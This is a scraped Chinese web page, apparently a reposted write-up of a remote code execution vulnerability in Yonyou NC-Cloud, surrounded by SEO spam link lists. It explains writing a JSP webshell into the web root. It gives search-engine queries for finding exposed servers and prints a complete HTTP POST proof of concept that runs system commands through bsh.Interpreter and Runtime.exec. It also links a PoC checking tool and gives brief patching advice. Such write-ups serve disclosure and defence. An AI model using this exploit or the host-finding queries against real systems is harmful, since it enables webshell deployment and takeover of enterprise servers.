当前位置: 首页 > news >正文

成都物流网站建设指数函数公式

成都物流网站建设,指数函数公式,建筑企业培训课程,网站开发模板word用友-NC-Cloud远程代码执行漏洞[2023-HW] 一、漏洞介绍二、资产搜索三、漏洞复现PoC小龙POC检测脚本: 四、修复建议 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失&#…

用友-NC-Cloud远程代码执行漏洞[2023-HW]

  • 一、漏洞介绍
  • 二、资产搜索
  • 三、漏洞复现
    • PoC
    • 小龙POC检测脚本:
  • 四、修复建议

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞介绍

该漏洞是通过请求特定的接口,然后调用"nc.itf.iufo.IBaseSPService"服务中的"saveXStreamConfig"方法进行请求;直接往webapps/nc_web/目录写马。最后访问刚才写的马,调用 Runtime.getRuntime().exec(“command”) 来执行系统命令,并通过getInputStream()获取该命令的输出流;然后IOUtils.toString() 方法将输出流转换为字符串。

二、资产搜索

FOFA:app=“用友-NC-Cloud”
鹰图:web.title=“大型企业数字化平台”
Hunter:web.body=“uap/rbac”

在这里插入图片描述

三、漏洞复现

通过接口写马,把马写到web目录:webapps/nc_web/

PoC

POST /0811.jsp?error=bsh.Interpreter HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cookiets=1681785470496; JSESSIONID=33989F450B1EA57D4D3ED07A343770FF.server
If-None-Match: W/"1571-1589211696000"
If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ifconfig").getInputStream())

在这里插入图片描述

小龙POC检测脚本:

小龙POC传送门: 小龙POC工具
在这里插入图片描述

四、修复建议

1.更新至最新版本

2.waf配置规则拦截敏感字符:eval(param、param.error等

http://www.khdw.cn/news/57346.html

相关文章:

  • 比较好的前端网站行者seo
  • 做多级分销的网站网络热词有哪些
  • php做网站好学吗网络营销研究背景及意义
  • 免费自建网站工具在线工具seo
  • 国外金融网站设计欣赏免费推广网站入口
  • 个人网站栏目设计广东企业网站seo报价
  • 武汉网站制作的公司互联网推广有哪些方式
  • 最早做网页的公司曹操论坛seo
  • 制作视频网站违法吗宁波seo外包引流推广
  • 网站建设企业公司推荐湖南企业seo优化推荐
  • 哈尔滨网站排名公司怎么上百度推广产品
  • 广州网站建设商家汕头网站建设公司
  • 网页设计的三大基本技术什么是seo优化?
  • 政府网站页面布局评价推广普通话奋进新征程演讲稿
  • 西安房产网站大全东莞互联网推广
  • 怎么在电脑上建立自己的网站pr的选择应该优先选择的链接为
  • 怎么让织梦网站适合手机哈尔滨seo网络推广
  • 莱西网站建设哪家好长沙网站关键词排名推广公司
  • 网络营销推广岗位职责优化软件
  • 郑州网站建设服务如何自己制作网站
  • 前端案例的网站营销方法有哪几种
  • 服务外包网站市场推广方式有哪几种
  • 土巴兔装修平台怎么收费湖州seo排名
  • wordpress启用主题网站出错aso排名优化知识
  • wordpress前台管理员6搜索引擎网站优化推广
  • app网站开发框架典型的口碑营销案例
  • 太仓网站制作公司哪家好快排seo排名软件
  • 搜索引擎网站推广怎么做产品网络推广的方法有哪些
  • 做公司子网站的请示报告天津提升专业关键词排名
  • 做网站公司 营销合肥网站seo费用